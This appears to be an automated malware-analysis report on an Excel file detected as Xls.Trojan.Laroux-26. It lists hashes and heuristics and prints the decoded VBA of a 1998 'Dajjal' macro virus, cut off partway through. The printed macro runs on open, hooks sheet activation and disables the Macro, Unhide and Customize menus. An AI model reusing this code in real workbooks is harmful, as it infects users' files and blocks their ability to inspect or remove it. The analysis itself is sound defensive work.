Xls.Trojan.Laroux-26 — Office (OLE) malware analysis

Static analysis result for SHA-256 0df0b036c3e57666…

MALICIOUS

Office (OLE)

Size: 56.0 KB
Created: 2000-12-28 05:59:05
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: d296535151afe88bf9e74a26ef5b4095
SHA-1: 139f21c5405d81257b4e689a966ddc20ba52f5bd
SHA-256: 0df0b036c3e576666dc54b2ee1edca7ec4a4a3b4cda09fb881eebbab6dfb0e92
Risk Score: 180

Malware Insights

Xls.Trojan.Laroux-26 · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Xls.Trojan.Laroux-26. It contains an Auto_Open VBA macro, which is a common technique for executing malicious code when the document is opened. The macro's comments suggest it is a computer virus, and its functionality is likely to download and execute a secondary payload, although the specific download URL is not present in the provided script excerpt.

Heuristics 3

  • ClamAV: Xls.Trojan.Laroux-26 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Trojan.Laroux-26
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • Auto_Open macro (severity: high, rule: OLE_VBA_AUTO)
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 15732 bytes
SHA-256: 4f5b673770e7fec70182c2f7dbdbb59b3a37f3b0d675c4955675631f91f57272
Detection: ClamAV: Xls.Trojan.Laroux-26
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script)

Attribute VB_Name = "SURIV_PJD_APKIR"
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"

    '==============================================================
    'Diprogram oleh       : ~Akut Wajuxacqupi~
    '   Programed by      :    ~Akut Wajuxacqupi~
    'Nama proyek          : Program eksperimental virus komputer
    '   Project name      :    Computer virus experimental program
    'Nama virus           : Dajjal
    '   Virus name        :    Dajjal
    'Saat pembuatan       : Mei 1998
    '   Created at        :    May 1998
    'Tempat pembuatan     : Jakarta, Indonesia
    '   Made in           :    Jakarta, Indonesia
    'Dipersembahkan untuk : Umat manusia
    '   Dedicated for     :    All human being
    'Waktu tampil         : Mulai Bulan Nopember 1998;
    '                       Tiap hari Senin sebelum pukul 12; dan
    '                       Pada hari istimewa
    '   Showing messages  :    Start in November 1998;
    '                          Every Monday before 12 am; and
    '                          At special date
    '==============================================================
    
    On Error GoTo AdaKesalahan
    
    Application.OnSheetActivate = "Proses"
    Application.CommandBars("Tools").Controls("Macro").Enabled = False
    Application.CommandBars("Window").Controls("Unhide...").Enabled = False
    Application.CommandBars("Tools").Controls("Customize...").Enabled = False
    Application.AutoCorrect.AddReplacement What:="yg", Replacement:="yang"
    Application.AutoCorrect.AddReplacement What:="wp", Replacement:="Wajib Pajak"
    Application.OnKey "^%d", "AboutVirus"
    Application.OnKey "%{f8}", ""
    Application.OnKey "%{f11}", ""
    Application.OnKey "^%z", "Hancurkan"
    
    
    'Activate the virus messages starting in November 1998
    'and only if one workbook is open
    If ((Month(Date) > 10 And Year(Date) = 1998) Or (Year(Date) > 1998) And _
        Application.Workbooks.Count < 3) And _
        Dir("C:\dajjal.off", vbHidden) <> "DAJJAL.OFF" Then TulisPesan
        
    
    'No error occurred
    GoTo Sukses

    'An error occurred
AdaKesalahan:
    'Pesan = MsgBox("Kesalahan adalah hal lumrah bagi seorang manusia", vbInformation + vbOKOnly, "Kesalahan")

Sukses:

End Sub

Sub Hancurkan()
Attribute Hancurkan.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.CommandBars("Tools").Controls("Customize...").Enabled = True
End Sub
Sub AboutVirus()
Attribute AboutVirus.VB_ProcData.VB_Invoke_Func = " \n14"
    
    Pesan = MsgBox( _
    "Diprogram oleh: ~Akut Wajuxacqupi~" + Chr(10) + _
    "       Programed by: ~Akut Wajuxacqupi~" + Chr(10) + _
    "Nama proyek: Program eksperimental virus komputer" + Chr(10) + _
    "       Project name: Computer virus experimental program" + Chr(10) + _
    "Nama virus: Dajjal" + Chr(10) + _
    "       Virus name: Dajjal" + Chr(10) + _
    "Tempat pembuatan: Jakarta, Indonesia" + Chr(10) + _
    "       Made in: Jakarta, Indonesia" + Chr(10) + _
    "Saat pembuatan: Mei 1998" + Chr(10) + _
    "       Created in: May 1998" + Chr(10) + _
    "Dipersembahkan untuk: Umat manusia" + Chr(10) + _
    "       Dedicated for: All human being" + Chr(10) + _
    "Waktu tampil: Mulai Bulan Nopember 1998; " + Chr(10) + _
    "   Tiap hari Senin sebelum pukul 12; dan" + Chr(10) + _
    "   Pada hari istimewa" + Chr(10) + _
    "       Show messages: Start in November 1998;" + Chr(10) + _
    "           Every Monday before 12 am; and" + Chr(10) + _
    "           At special date", _
    vbOKOnly + vbInformation, "About Dajjal virus")

End Sub

Sub TulisPesan()
Attribute TulisPesan.VB_ProcData.VB_Invoke_Func = " \n14"
        
    Randomize Timer
    
    'Anniversary of the Republic of Indonesia (HUT RI)
    If Day(Date) = 17 And Month(Date) = 8 Then
        Pesan = MsgBox("Negeri kita tercinta sedang berulang tahun hari ini." + Chr(10) + _
        "Mari kita rayakan!", vbOKOnly + vbExclamation, "HUT RI")
    End If
    
    'Reform (REFORMASI)
    If Day(Date) = 14 And
... (truncated)